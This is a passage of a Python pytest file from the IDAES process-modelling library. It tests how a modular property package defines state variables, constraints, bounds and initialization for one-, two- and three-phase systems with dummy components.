define_default_scaling_factors,
state_initialization,
_set_mole_fractions_vle,
_modified_rachford_rice,
)
from idaes.core import (
MaterialFlowBasis,
MaterialBalanceType,
EnergyBalanceType,
declare_process_block_class,
PhaseType,
LiquidPhase,
VaporPhase,
)
from idaes.models.properties.modular_properties.base.generic_property import (
GenericParameterData,
)
from idaes.models.properties.modular_properties.base.tests.dummy_eos import DummyEoS
from idaes.core.util.exceptions import ConfigurationError, UserModelError
from idaes.models.properties.modular_properties.phase_equil.henry import (
ConstantH,
HenryType,
)
from idaes.models.properties.modular_properties.phase_equil.bubble_dew import (
IdealBubbleDew,
)
import idaes.logger as idaeslog
from idaes.models.properties.modular_properties.base.generic_property import (
GenericParameterBlock,
)
from idaes.models.properties.modular_properties.phase_equil.forms import fugacity
from idaes.core import VaporPhase, LiquidPhase, Component
@declare_process_block_class("DummyParameterBlock")
class DummyParameterData(GenericParameterData):
pass
@pytest.mark.unit
def test_set_metadata():
assert set_metadata(None) is None
# Dummy methods for dummied submodules
class dummy_pe:
def return_expression(b, *args):
# Return a dummy expression for the constraint
return b.temperature == 100
def phase_equil(b, *args):
pass
class TestInvalidBounds(object):
@pytest.mark.unit
def test_bad_name(self):
m = ConcreteModel()
m.params = DummyParameterBlock(
default={
"components": {"c1": {}, "c2": {}, "c3": {}},
"phases": {"p1": {"equation_of_state": DummyEoS}},
"state_definition": modules[__name__],
"pressure_ref": 1e5,
"temperature_ref": 300,
"base_units": {
"time": pyunits.s,
"length": pyunits.m,
"mass": pyunits.kg,
"amount": pyunits.mol,
"temperature": pyunits.K,
},
"state_bounds": {"foo": (None, None, None)},
}
)
with pytest.raises(
ConfigurationError,
match="props\[1\] - found unexpected state_bounds key foo. "
"Please ensure bounds are provided only for expected state "
"variables and that you have typed the variable names "
"correctly.",
):
m.props = m.params.build_state_block([1], default={"defined_state": True})
@pytest.mark.unit
def test_mole_frac(self, caplog):
m = ConcreteModel()
caplog.set_level(
idaeslog.WARNING, logger=("idaes.models.properties.modular_properties.")
)
m.params = DummyParameterBlock(
default={
"components": {"c1": {}, "c2": {}, "c3": {}},
"phases": {"p1": {"equation_of_state": DummyEoS}},
"state_definition": modules[__name__],
"pressure_ref": 1e5,
"temperature_ref": 300,
"base_units": {
"time": pyunits.s,
"length": pyunits.m,
"mass": pyunits.kg,
"amount": pyunits.mol,
"temperature": pyunits.K,
},
"state_bounds": {"mole_frac_comp": (None, None, None)},
}
)
# Create a dummy state block
m.props = m.params.build_state_block([1], default={"defined_state": True})
assert (
"props[1] - found state_bounds argument for mole_frac_comp."
" Mole fraction bounds are set automatically and "
"this argument will be ignored." in caplog.text
)
class Test1PhaseDefinedStateFalseNoBounds(object):
# Test define_state method with no bounds and defined_State = False
@pytest.fixture(scope="class")
def frame(self):
m = ConcreteModel()
m.params = DummyParameterBlock(
default={
"components": {"c1": {}, "c2": {}, "c3": {}},
"phases": {"p1": {"equation_of_state": DummyEoS}},
"state_definition": modules[__name__],
"pressure_ref": 1e5,
"temperature_ref": 300,
"base_units": {
"time": pyunits.s,
"length": pyunits.m,
"mass": pyunits.kg,
"amount": pyunits.mol,
"temperature": pyunits.K,
},
}
)
# Create state block
m.props = m.params.build_state_block([1], default={"defined_state": False})
# Add necessary variables that would be built by other methods
m.props[1].dens_mol_phase = Var(m.params.phase_list, initialize=1)
m.props[1].enth_mol_phase = Var(m.params.phase_list, initialize=1)
return m
@pytest.mark.unit
def test_always_flash(self, frame):
define_state(frame.props[1])
assert frame.props[1].always_flash
@pytest.mark.unit
def test_vars(self, frame):
# Check that all necessary variables have been constructed and have
# the correct values
assert isinstance(frame.props[1].flow_mol, Var)
assert frame.props[1].flow_mol.value is None
assert check_units_equivalent(frame.props[1].flow_mol, pyunits.mol / pyunits.s)
assert isinstance(frame.props[1].mole_frac_comp, Var)
assert len(frame.props[1].mole_frac_comp) == 3
for i in frame.props[1].mole_frac_comp:
assert i in frame.props[1].params.component_list
assert frame.props[1].mole_frac_comp[i].value == 1 / 3
assert check_units_equivalent(frame.props[1].mole_frac_comp, None)
assert isinstance(frame.props[1].pressure, Var)
assert frame.props[1].pressure.value is None
assert check_units_equivalent(frame.props[1].pressure, pyunits.Pa)
assert isinstance(frame.props[1].temperature, Var)
assert frame.props[1].temperature.value is None
assert check_units_equivalent(frame.props[1].temperature, pyunits.K)
assert isinstance(frame.props[1].flow_mol_phase, Var)
assert len(frame.props[1].flow_mol_phase) == 1
for i in frame.props[1].flow_mol_phase:
assert i in frame.props[1].params.phase_list
assert frame.props[1].flow_mol_phase[i].value is None
assert check_units_equivalent(
frame.props[1].flow_mol_phase, pyunits.mol / pyunits.s
)
assert isinstance(frame.props[1].phase_frac, Var)
assert len(frame.props[1].phase_frac) == 1
for i in frame.props[1].phase_frac:
assert i in frame.props[1].params.phase_list
assert frame.props[1].phase_frac[i].value == 1
assert check_units_equivalent(frame.props[1].phase_frac, None)
assert isinstance(frame.props[1].mole_frac_phase_comp, Var)
assert len(frame.props[1].mole_frac_phase_comp) == 3
for i in frame.props[1].mole_frac_phase_comp:
assert i in [("p1", "c1"), ("p1", "c2"), ("p1", "c3")]
assert frame.props[1].mole_frac_phase_comp[i].value == 1 / 3
assert check_units_equivalent(frame.props[1].mole_frac_phase_comp, None)
@pytest.mark.unit
def test_constraints(self, frame):
# Check that the correct constraints are present
assert isinstance(frame.props[1].total_flow_balance, Constraint)
assert len(frame.props[1].total_flow_balance) == 1
assert str(frame.props[1].total_flow_balance.body) == str(
frame.props[1].flow_mol
- frame.props[1].flow_mol_phase[frame.params.phase_list[1]]
)
assert isinstance(frame.props[1].component_flow_balances, Constraint)
assert len(frame.props[1].component_flow_balances) == 3
for i in frame.props[1].component_flow_balances:
assert i in frame.props[1].params.component_list
assert str(frame.props[1].component_flow_balances[i].body) == str(
frame.props[1].mole_frac_comp[i]
- frame.props[1].mole_frac_phase_comp[frame.params.phase_list[1], i]
)
assert isinstance(frame.props[1].sum_mole_frac_out, Constraint)
assert len(frame.props[1].sum_mole_frac_out) == 1
assert str(frame.props[1].sum_mole_frac_out.body) == str(
sum(
frame.props[1].mole_frac_comp[i]
for i in frame.props[1].params.component_list
)
)
assert isinstance(frame.props[1].phase_fraction_constraint, Constraint)
assert len(frame.props[1].phase_fraction_constraint) == 1
for i in frame.props[1].phase_fraction_constraint:
assert i in frame.props[1].params.phase_list
assert str(frame.props[1].phase_fraction_constraint[i].body) == str(
frame.props[1].phase_frac[i]
)
assert_units_consistent(frame.props[1])
class Test1PhaseDefinedStateTrueWithBounds(object):
# Test define_state method with no bounds and defined_State = False
@pytest.fixture(scope="class")
def frame(self):
m = ConcreteModel()
# Create a dummy parameter block
m.params = DummyParameterBlock(
default={
"components": {"c1": {}, "c2": {}, "c3": {}},
"phases": {"p1": {"equation_of_state": DummyEoS}},
"state_definition": modules[__name__],
"pressure_ref": 1e5,
"temperature_ref": 300,
"state_bounds": {
"flow_mol": (0, 100, 200),
"temperature": (290, 345, 400),
"pressure": (1e5, 3e5, 5e5),
},
"base_units": {
"time": pyunits.s,
"length": pyunits.m,
"mass": pyunits.kg,
"amount": pyunits.mol,
"temperature": pyunits.K,
},
}
)
# Create state block
m.props = m.params.build_state_block([1], default={"defined_state": True})
# Add necessary variables that would be built by other methods
m.props[1].dens_mol_phase = Var(m.params.phase_list, initialize=1)
m.props[1].enth_mol_phase = Var(m.params.phase_list, initialize=1)
return m
@pytest.mark.unit
def test_always_flash(self, frame):
define_state(frame.props[1])
assert frame.props[1].always_flash
@pytest.mark.unit
def test_vars(self, frame):
# Check that all necessary variables have been constructed and have
# the correct values
assert isinstance(frame.props[1].flow_mol, Var)
assert frame.props[1].flow_mol.value == 100
assert frame.props[1].flow_mol.lb == 0
assert frame.props[1].flow_mol.ub == 200
assert check_units_equivalent(frame.props[1].flow_mol, pyunits.mol / pyunits.s)
assert isinstance(frame.props[1].mole_frac_comp, Var)
assert len(frame.props[1].mole_frac_comp) == 3
for i in frame.props[1].mole_frac_comp:
assert i in frame.props[1].params.component_list
assert frame.props[1].mole_frac_comp[i].value == 1 / 3
assert check_units_equivalent(frame.props[1].mole_frac_comp, None)
assert isinstance(frame.props[1].pressure, Var)
assert frame.props[1].pressure.value == 3e5
assert frame.props[1].pressure.lb == 1e5
assert frame.props[1].pressure.ub == 5e5
assert check_units_equivalent(frame.props[1].pressure, pyunits.Pa)
assert isinstance(frame.props[1].temperature, Var)
assert frame.props[1].temperature.value == 345
assert frame.props[1].temperature.lb == 290
assert frame.props[1].temperature.ub == 400
assert check_units_equivalent(frame.props[1].temperature, pyunits.K)
assert isinstance(frame.props[1].flow_mol_phase, Var)
assert len(frame.props[1].flow_mol_phase) == 1
for i in frame.props[1].flow_mol_phase:
assert i in frame.props[1].params.phase_list
assert frame.props[1].flow_mol_phase[i].value == 100
assert frame.props[1].flow_mol_phase[i].lb == 0
assert frame.props[1].flow_mol_phase[i].ub == 200
assert check_units_equivalent(
frame.props[1].flow_mol_phase, pyunits.mol / pyunits.s
)
assert isinstance(frame.props[1].phase_frac, Var)
assert len(frame.props[1].phase_frac) == 1
for i in frame.props[1].phase_frac:
assert i in frame.props[1].params.phase_list
assert frame.props[1].phase_frac[i].value == 1
assert check_units_equivalent(frame.props[1].phase_frac, None)
assert isinstance(frame.props[1].mole_frac_phase_comp, Var)
assert len(frame.props[1].mole_frac_phase_comp) == 3
for i in frame.props[1].mole_frac_phase_comp:
assert i in [("p1", "c1"), ("p1", "c2"), ("p1", "c3")]
assert frame.props[1].mole_frac_phase_comp[i].value == 1 / 3
assert check_units_equivalent(frame.props[1].mole_frac_phase_comp, None)
@pytest.mark.unit
def test_constraints(self, frame):
# Check that the correct constraints are present
assert isinstance(frame.props[1].total_flow_balance, Constraint)
assert len(frame.props[1].total_flow_balance) == 1
assert str(frame.props[1].total_flow_balance.body) == str(
frame.props[1].flow_mol
- frame.props[1].flow_mol_phase[frame.params.phase_list[1]]
)
assert isinstance(frame.props[1].component_flow_balances, Constraint)
assert len(frame.props[1].component_flow_balances) == 3
for i in frame.props[1].component_flow_balances:
assert i in frame.props[1].params.component_list
assert str(frame.props[1].component_flow_balances[i].body) == str(
frame.props[1].mole_frac_comp[i]
- frame.props[1].mole_frac_phase_comp[frame.params.phase_list[1], i]
)
assert not hasattr(frame.props[1], "sum_mole_frac_out")
assert isinstance(frame.props[1].phase_fraction_constraint, Constraint)
assert len(frame.props[1].phase_fraction_constraint) == 1
for i in frame.props[1].phase_fraction_constraint:
assert i in frame.props[1].params.phase_list
assert str(frame.props[1].phase_fraction_constraint[i].body) == str(
frame.props[1].phase_frac[i]
)
assert_units_consistent(frame.props[1])
@pytest.mark.unit
def test_initialization(self, frame):
state_initialization(frame.props[1])
assert isinstance(frame.props[1].temperature, Var)
assert isinstance(frame.props[1].pressure, Var)
assert isinstance(frame.props[1].flow_mol, Var)
assert isinstance(frame.props[1].mole_frac_comp, Var)
assert isinstance(frame.props[1].flow_mol_phase, Var)
assert isinstance(frame.props[1].flow_mol_phase_comp, Expression)
assert isinstance(frame.props[1].phase_frac, Var)
assert isinstance(frame.props[1].mole_frac_phase_comp, Var)
assert frame.props[1].temperature.value == approx(345)
assert frame.props[1].pressure.value == approx(3e5)
assert frame.props[1].flow_mol.value == approx(100)
assert frame.props[1].phase_frac["p1"].value == approx(1)
assert frame.props[1].flow_mol_phase["p1"].value == approx(100)
for j in frame.props[1].component_list:
assert frame.props[1].mole_frac_comp[j].value == approx(1 / 3)
assert frame.props[1].mole_frac_phase_comp["p1", j].value == approx(1 / 3)
assert approx(100 / 3) == value(frame.props[1].flow_mol_phase_comp["p1", j])
class Test2PhaseDefinedStateFalseNoBounds(object):
# Test define_state method with no bounds and defined_State = False
@pytest.fixture(scope="class")
def frame(self):
m = ConcreteModel()
# Create a dummy parameter block
m.params = DummyParameterBlock(
default={
"components": {"c1": {}, "c2": {}, "c3": {}},
"phases": {
"p1": {"equation_of_state": DummyEoS},
"p2": {"equation_of_state": DummyEoS},
},
"state_definition": modules[__name__],
"pressure_ref": 1e5,
"temperature_ref": 300,
"base_units": {
"time": pyunits.s,
"length": pyunits.m,
"mass": pyunits.kg,
"amount": pyunits.mol,
"temperature": pyunits.K,
},
}
)
# Create state block
m.props = m.params.build_state_block([1], default={"defined_state": False})
# Add necessary variables that would be built by other methods
m.props[1].dens_mol_phase = Var(m.params.phase_list, initialize=1)
m.props[1].enth_mol_phase = Var(m.params.phase_list, initialize=1)
return m
@pytest.mark.unit
def test_always_flash(self, frame):
define_state(frame.props[1])
assert frame.props[1].always_flash
@pytest.mark.unit
def test_vars(self, frame):
# Check that all necessary variables have been constructed and have
# the correct values
assert isinstance(frame.props[1].flow_mol, Var)
assert frame.props[1].flow_mol.value is None
assert check_units_equivalent(frame.props[1].flow_mol, pyunits.mol / pyunits.s)
assert isinstance(frame.props[1].mole_frac_comp, Var)
assert len(frame.props[1].mole_frac_comp) == 3
for i in frame.props[1].mole_frac_comp:
assert i in frame.props[1].params.component_list
assert frame.props[1].mole_frac_comp[i].value == 1 / 3
assert check_units_equivalent(frame.props[1].mole_frac_comp, None)
assert isinstance(frame.props[1].pressure, Var)
assert frame.props[1].pressure.value is None
assert check_units_equivalent(frame.props[1].pressure, pyunits.Pa)
assert isinstance(frame.props[1].temperature, Var)
assert frame.props[1].temperature.value is None
assert check_units_equivalent(frame.props[1].temperature, pyunits.K)
assert isinstance(frame.props[1].flow_mol_phase, Var)
assert len(frame.props[1].flow_mol_phase) == 2
for i in frame.props[1].flow_mol_phase:
assert i in frame.props[1].params.phase_list
assert frame.props[1].flow_mol_phase[i].value is None
assert check_units_equivalent(
frame.props[1].flow_mol_phase, pyunits.mol / pyunits.s
)
assert isinstance(frame.props[1].phase_frac, Var)
assert len(frame.props[1].phase_frac) == 2
for i in frame.props[1].phase_frac:
assert i in frame.props[1].params.phase_list
assert frame.props[1].phase_frac[i].value == 1 / 2
assert check_units_equivalent(frame.props[1].phase_frac, None)
assert isinstance(frame.props[1].mole_frac_phase_comp, Var)
assert len(frame.props[1].mole_frac_phase_comp) == 6
for i in frame.props[1].mole_frac_phase_comp:
assert i in [
("p1", "c1"),
("p1", "c2"),
("p1", "c3"),
("p2", "c1"),
("p2", "c2"),
("p2", "c3"),
]
assert frame.props[1].mole_frac_phase_comp[i].value == 1 / 3
assert check_units_equivalent(frame.props[1].mole_frac_phase_comp, None)
@pytest.mark.unit
def test_constraints(self, frame):
# Check that the correct constraints are present
assert isinstance(frame.props[1].total_flow_balance, Constraint)
assert len(frame.props[1].total_flow_balance) == 1
assert str(frame.props[1].total_flow_balance.body) == str(
sum(
frame.props[1].flow_mol_phase[p]
for p in frame.props[1].params.phase_list
)
- frame.props[1].flow_mol
)
assert isinstance(frame.props[1].component_flow_balances, Constraint)
assert len(frame.props[1].component_flow_balances) == 3
for i in frame.props[1].component_flow_balances:
assert i in frame.props[1].params.component_list
assert str(frame.props[1].component_flow_balances[i].body) == str(
frame.props[1].flow_mol * frame.props[1].mole_frac_comp[i]
- sum(
frame.props[1].flow_mol_phase[p]
* frame.props[1].mole_frac_phase_comp[p, i]
for p in frame.props[1].params.phase_list
)
)
assert isinstance(frame.props[1].sum_mole_frac, Constraint)
assert len(frame.props[1].sum_mole_frac) == 1
assert str(frame.props[1].sum_mole_frac.body) == str(
sum(
frame.props[1].mole_frac_phase_comp[
frame.props[1].params.phase_list[1], i
]
for i in frame.props[1].params.component_list
)
- sum(
frame.props[1].mole_frac_phase_comp[
frame.props[1].params.phase_list[2], i
]
for i in frame.props[1].params.component_list
)
)
assert isinstance(frame.props[1].sum_mole_frac_out, Constraint)
assert len(frame.props[1].sum_mole_frac_out) == 1
assert str(frame.props[1].sum_mole_frac_out.body) == str(
sum(
frame.props[1].mole_frac_comp[i]
for i in frame.props[1].params.component_list
)
)
assert isinstance(frame.props[1].phase_fraction_constraint, Constraint)
assert len(frame.props[1].phase_fraction_constraint) == 2
for i in frame.props[1].phase_fraction_constraint:
assert i in frame.props[1].params.phase_list
assert str(frame.props[1].phase_fraction_constraint[i].body) == str(
frame.props[1].phase_frac[i] * frame.props[1].flow_mol
- frame.props[1].flow_mol_phase[i]
)
assert_units_consistent(frame.props[1])
class Test2PhaseDefinedStateTrueWithBounds(object):
# Test define_state method with no bounds and defined_State = False
@pytest.fixture(scope="class")
def frame(self):
m = ConcreteModel()
# Create a dummy parameter block
m.params = DummyParameterBlock(
default={
"components": {"c1": {}, "c2": {}, "c3": {}},
"phases": {
"p1": {"equation_of_state": DummyEoS},
"p2": {"equation_of_state": DummyEoS},
},
"state_definition": modules[__name__],
"pressure_ref": 1e5,
"temperature_ref": 300,
"state_bounds": {
"flow_mol": (0, 100, 200),
"temperature": (290, 345, 400),
"pressure": (1e5, 3e5, 5e5),
},
"base_units": {
"time": pyunits.s,
"length": pyunits.m,
"mass": pyunits.kg,
"amount": pyunits.mol,
"temperature": pyunits.K,
},
}
)
# Create state block
m.props = m.params.build_state_block([1], default={"defined_state": True})
# Add necessary variables that would be built by other methods
m.props[1].dens_mol_phase = Var(m.params.phase_list, initialize=1)
m.props[1].enth_mol_phase = Var(m.params.phase_list, initialize=1)
return m
@pytest.mark.unit
def test_always_flash(self, frame):
define_state(frame.props[1])
assert frame.props[1].always_flash
@pytest.mark.unit
def test_vars(self, frame):
# Check that all necessary variables have been constructed and have
# the correct values
assert isinstance(frame.props[1].flow_mol, Var)
assert frame.props[1].flow_mol.value == 100
assert frame.props[1].flow_mol.lb == 0
assert frame.props[1].flow_mol.ub == 200
assert check_units_equivalent(frame.props[1].flow_mol, pyunits.mol / pyunits.s)
assert isinstance(frame.props[1].mole_frac_comp, Var)
assert len(frame.props[1].mole_frac_comp) == 3
for i in frame.props[1].mole_frac_comp:
assert i in frame.props[1].params.component_list
assert frame.props[1].mole_frac_comp[i].value == 1 / 3
assert check_units_equivalent(frame.props[1].mole_frac_comp, None)
assert isinstance(frame.props[1].pressure, Var)
assert frame.props[1].pressure.value == 3e5
assert frame.props[1].pressure.lb == 1e5
assert frame.props[1].pressure.ub == 5e5
assert check_units_equivalent(frame.props[1].pressure, pyunits.Pa)
assert isinstance(frame.props[1].temperature, Var)
assert frame.props[1].temperature.value == 345
assert frame.props[1].temperature.lb == 290
assert frame.props[1].temperature.ub == 400
assert check_units_equivalent(frame.props[1].temperature, pyunits.K)
assert isinstance(frame.props[1].flow_mol_phase, Var)
assert len(frame.props[1].flow_mol_phase) == 2
for i in frame.props[1].flow_mol_phase:
assert i in frame.props[1].params.phase_list
assert frame.props[1].flow_mol_phase[i].value == 100 / 2
assert frame.props[1].flow_mol_phase[i].lb == 0
assert frame.props[1].flow_mol_phase[i].ub == 200
assert check_units_equivalent(
frame.props[1].flow_mol_phase, pyunits.mol / pyunits.s
)
assert isinstance(frame.props[1].phase_frac, Var)
assert len(frame.props[1].phase_frac) == 2
for i in frame.props[1].phase_frac:
assert i in frame.props[1].params.phase_list
assert frame.props[1].phase_frac[i].value == 1 / 2
assert check_units_equivalent(frame.props[1].phase_frac, None)
assert isinstance(frame.props[1].mole_frac_phase_comp, Var)
assert len(frame.props[1].mole_frac_phase_comp) == 6
for i in frame.props[1].mole_frac_phase_comp:
assert i in [
("p1", "c1"),
("p1", "c2"),
("p1", "c3"),
("p2", "c1"),
("p2", "c2"),
("p2", "c3"),
]
assert frame.props[1].mole_frac_phase_comp[i].value == 1 / 3
assert check_units_equivalent(frame.props[1].mole_frac_phase_comp, None)
@pytest.mark.unit
def test_constraints(self, frame):
# Check that the correct constraints are present
assert isinstance(frame.props[1].total_flow_balance, Constraint)
assert len(frame.props[1].total_flow_balance) == 1
assert str(frame.props[1].total_flow_balance.body) == str(
sum(
frame.props[1].flow_mol_phase[p]
for p in frame.props[1].params.phase_list
)
- frame.props[1].flow_mol
)
assert isinstance(frame.props[1].component_flow_balances, Constraint)
assert len(frame.props[1].component_flow_balances) == 3
for i in frame.props[1].component_flow_balances:
assert i in frame.props[1].params.component_list
assert str(frame.props[1].component_flow_balances[i].body) == str(
frame.props[1].flow_mol * frame.props[1].mole_frac_comp[i]
- sum(
frame.props[1].flow_mol_phase[p]
* frame.props[1].mole_frac_phase_comp[p, i]
for p in frame.props[1].params.phase_list
)
)
assert isinstance(frame.props[1].sum_mole_frac, Constraint)
assert len(frame.props[1].sum_mole_frac) == 1
assert str(frame.props[1].sum_mole_frac.body) == str(
sum(
frame.props[1].mole_frac_phase_comp[
frame.props[1].params.phase_list[1], i
]
for i in frame.props[1].params.component_list
)
- sum(
frame.props[1].mole_frac_phase_comp[
frame.props[1].params.phase_list[2], i
]
for i in frame.props[1].params.component_list
)
)
assert not hasattr(frame.props[1], "sum_mole_frac_out")
assert isinstance(frame.props[1].phase_fraction_constraint, Constraint)
assert len(frame.props[1].phase_fraction_constraint) == 2
for i in frame.props[1].phase_fraction_constraint:
assert i in frame.props[1].params.phase_list
assert str(frame.props[1].phase_fraction_constraint[i].body) == str(
frame.props[1].phase_frac[i] * frame.props[1].flow_mol
- frame.props[1].flow_mol_phase[i]
)
assert_units_consistent(frame.props[1])
@pytest.mark.unit
def test_initialization(self, frame):
state_initialization(frame.props[1])
assert isinstance(frame.props[1].temperature, Var)
assert isinstance(frame.props[1].pressure, Var)
assert isinstance(frame.props[1].flow_mol, Var)
assert isinstance(frame.props[1].mole_frac_comp, Var)
assert isinstance(frame.props[1].flow_mol_phase, Var)
assert isinstance(frame.props[1].flow_mol_phase_comp, Expression)
assert isinstance(frame.props[1].phase_frac, Var)
assert isinstance(frame.props[1].mole_frac_phase_comp, Var)
assert frame.props[1].temperature.value == approx(345)
assert frame.props[1].pressure.value == approx(3e5)
assert frame.props[1].flow_mol.value == approx(100)
for p in frame.props[1].phase_list:
assert frame.props[1].phase_frac[p].value == approx(0.5)
assert frame.props[1].flow_mol_phase[p].value == approx(50)
for j in frame.props[1].component_list:
assert frame.props[1].mole_frac_comp[j].value == approx(1 / 3)
assert frame.props[1].mole_frac_phase_comp[p, j].value == approx(1 / 3)
assert approx(50 / 3) == value(frame.props[1].flow_mol_phase_comp[p, j])
frame.props[1].phase_frac["p1"].value = 0.4
state_initialization(frame.props[1])
assert frame.props[1].phase_frac["p1"].value == approx(0.4)
assert frame.props[1].flow_mol_phase["p1"].value == approx(40)
for j in frame.props[1].component_list:
assert frame.props[1].mole_frac_comp[j].value == approx(1 / 3)
assert frame.props[1].mole_frac_phase_comp["p1", j].value == approx(1 / 3)
assert approx(40 / 3) == value(frame.props[1].flow_mol_phase_comp["p1", j])
assert frame.props[1].phase_frac["p2"].value == approx(0.5)
assert frame.props[1].flow_mol_phase["p2"].value == approx(50)
for j in frame.props[1].component_list:
assert frame.props[1].mole_frac_phase_comp["p2", j].value == approx(1 / 3)
assert approx(50 / 3) == value(frame.props[1].flow_mol_phase_comp["p2", j])
# To avoid side effects
frame.props[1].phase_frac["p1"].value = 0.5
state_initialization(frame.props[1])
class Test3PhaseDefinedStateFalseNoBounds(object):
# Test define_state method with no bounds and defined_State = False
@pytest.fixture(scope="class")
def frame(self):
m = ConcreteModel()
# Create a dummy parameter block
m.params = DummyParameterBlock(
default={
"components": {"c1": {}, "c2": {}, "c3": {}},
"phases": {
"p1": {"equation_of_state": DummyEoS},
"p2": {"equation_of_state": DummyEoS},
"p3": {"equation_of_state": DummyEoS},
},
"state_definition": modules[__name__],
"pressure_ref": 1e5,
"temperature_ref": 300,
"base_units": {
"time": pyunits.s,
"length": pyunits.m,
"mass": pyunits.kg,
"amount": pyunits.mol,
"temperature": pyunits.K,
},
}
)
# Create state block
m.props = m.params.build_state_block([1], default={"defined_state": False})
# Add necessary variables that would be built by other methods
m.props[1].dens_mol_phase = Var(m.params.phase_list, initialize=1)
m.props[1].enth_mol_phase = Var(m.params.phase_list, initialize=1)
return m
@pytest.mark.unit
def test_always_flash(self, frame):
define_state(frame.props[1])
assert frame.props[1].always_flash
@pytest.mark.unit
def test_vars(self, frame):
# Check that all necessary variables have been constructed and have
# the correct values
assert isinstance(frame.props[1].flow_mol, Var)
assert frame.props[1].flow_mol.value is None
assert check_units_equivalent(frame.props[1].flow_mol, pyunits.mol / pyunits.s)
assert isinstance(frame.props[1].mole_frac_comp, Var)
assert len(frame.props[1].mole_frac_comp) == 3
for i in frame.props[1].mole_frac_comp:
assert i in frame.props[1].params.component_list
assert frame.props[1].mole_frac_comp[i].value == 1 / 3
assert check_units_equivalent(frame.props[1].mole_frac_comp, None)
assert isinstance(frame.props[1].pressure, Var)
assert frame.props[1].pressure.value is None
assert check_units_equivalent(frame.props[1].pressure, pyunits.Pa)
assert isinstance(frame.props[1].temperature, Var)
assert frame.props[1].temperature.value is None
assert check_units_equivalent(frame.props[1].temperature, pyunits.K)
assert isinstance(frame.props[1].flow_mol_phase, Var)
assert len(frame.props[1].flow_mol_phase) == 3
for i in frame.props[1].flow_mol_phase:
assert i in frame.props[1].params.phase_list
assert frame.props[1].flow_mol_phase[i].value is None
assert check_units_equivalent(
frame.props[1].flow_mol_phase, pyunits.mol / pyunits.s
)
assert isinstance(frame.props[1].phase_frac, Var)
assert len(frame.props[1].phase_frac) == 3
for i in frame.props[1].phase_frac:
assert i in frame.props[1].params.phase_list
assert frame.props[1].phase_frac[i].value == 1 / 3
assert check_units_equivalent(frame.props[1].phase_frac, None)
assert isinstance(frame.props[1].mole_frac_phase_comp, Var)
assert len(frame.props[1].mole_frac_phase_comp) == 9
for i in frame.props[1].mole_frac_phase_comp:
assert i in [
("p1", "c1"),
("p1", "c2"),
("p1", "c3"),
("p2", "c1"),
("p2", "c2"),
("p2", "c3"),
("p3", "c1"),
("p3", "c2"),
("p3", "c3"),
]
assert frame.props[1].mole_frac_phase_comp[i].value == 1 / 3
assert check_units_equivalent(frame.props[1].mole_frac_phase_comp, None)
@pytest.mark.unit
def test_constraints(self, frame):
# Check that the correct constraints are present
assert isinstance(frame.props[1].component_flow_balances, Constraint)
assert len(frame.props[1].component_flow_balances) == 3
for j in frame.props[1].component_flow_balances:
assert j in frame.params.component_list
assert str(frame.props[1].component_flow_balances[j].body) == str(
frame.props[1].flow_mol * frame.props[1].mole_frac_comp[j]
- sum(
frame.props[1].flow_mol_phase[p]
* frame.props[1].mole_frac_phase_comp[p, j]
for p in frame.props[1].params.phase_list
)
)
assert isinstance(frame.props[1].sum_mole_frac, Constraint)
assert len(frame.props[1].sum_mole_frac) == 3
for p in frame.props[1].sum_mole_frac:
assert p in frame.params.phase_list
assert str(frame.props[1].sum_mole_frac[p].body) == str(
sum(
frame.props[1].mole_frac_phase_comp[p, i]
for i in frame.props[1].params.component_list
)
)
assert isinstance(frame.props[1].sum_mole_frac_out, Constraint)
assert len(frame.props[1].sum_mole_frac_out) == 1
assert str(frame.props[1].sum_mole_frac_out.body) == str(
sum(
frame.props[1].mole_frac_comp[i]
for i in frame.props[1].params.component_list
)
)
assert isinstance(frame.props[1].phase_fraction_constraint, Constraint)
assert len(frame.props[1].phase_fraction_constraint) == 3
for i in frame.props[1].phase_fraction_constraint:
assert i in frame.props[1].params.phase_list
assert str(frame.props[1].phase_fraction_constraint[i].body) == str(
frame.props[1].phase_frac[i] * frame.props[1].flow_mol
- frame.props[1].flow_mol_phase[i]
)
assert_units_consistent(frame.props[1])
class Test3PhaseDefinedStateTrueWithBounds(object):
# Test define_state method with no bounds and defined_State = False
@pytest.fixture(scope="class")
def frame(self):
m = ConcreteModel()
# Create a dummy parameter block
m.params = DummyParameterBlock(
default={
"components": {"c1": {}, "c2": {}, "c3": {}},
"phases": {
"p1": {"equation_of_state": DummyEoS},
"p2": {"equation_of_state": DummyEoS},
"p3": {"equation_of_state": DummyEoS},
},
"state_definition": modules[__name__],
"pressure_ref": 1e5,
"temperature_ref": 300,
"state_bounds": {
"flow_mol": (0, 100, 200),
"temperature": (290, 345, 400),
"pressure": (1e5, 3e5, 5e5),
},
"base_units": {
"time": pyunits.s,
"length": pyunits.m,
"mass": pyunits.kg,
"amount": pyunits.mol,
"temperature": pyunits.K,
},
}
)
# Create state block
m.props = m.params.build_state_block([1], default={"defined_state": True})
# Add necessary variables that would be built by other methods
m.props[1].dens_mol_phase = Var(m.params.phase_list, initialize=1)
m.props[1].enth_mol_phase = Var(m.params.phase_list, initialize=1)
return m
@pytest.mark.unit
def test_always_flash(self, frame):
define_state(frame.props[1])
assert frame.props[1].always_flash
@pytest.mark.unit
def test_vars(self, frame):
# Check that all necessary variables have been constructed and have
# the correct values
assert isinstance(frame.props[1].flow_mol, Var)
assert frame.props[1].flow_mol.value == 100
assert frame.props[1].flow_mol.lb == 0
assert frame.props[1].flow_mol.ub == 200
assert check_units_equivalent(frame.props[1].flow_mol, pyunits.mol / pyunits.s)
assert isinstance(frame.props[1].mole_frac_comp, Var)
assert len(frame.props[1].mole_frac_comp) == 3
for i in frame.props[1].mole_frac_comp:
assert i in frame.props[1].params.component_list
assert frame.props[1].mole_frac_comp[i].value == 1 / 3
assert check_units_equivalent(frame.props[1].mole_frac_comp, None)
assert isinstance(frame.props[1].pressure, Var)
assert frame.props[1].pressure.value == 3e5
assert frame.props[1].pressure.lb == 1e5
assert frame.props[1].pressure.ub == 5e5
assert check_units_equivalent(frame.props[1].pressure, pyunits.Pa)
assert isinstance(frame.props[1].temperature, Var)
assert frame.props[1].temperature.value == 345
assert frame.props[1].temperature.lb == 290
assert frame.props[1].temperature.ub == 400
assert check_units_equivalent(frame.props[1].temperature, pyunits.K)
assert isinstance(frame.props[1].flow_mol_phase, Var)
assert len(frame.props[1].flow_mol_phase) == 3
for i in frame.props[1].flow_mol_phase:
assert i in frame.props[1].params.phase_list
assert frame.props[1].flow_mol_phase[i].value == 100 / 3
assert frame.props[1].flow_mol_phase[i].lb == 0
assert frame.props[1].flow_mol_phase[i].ub == 200
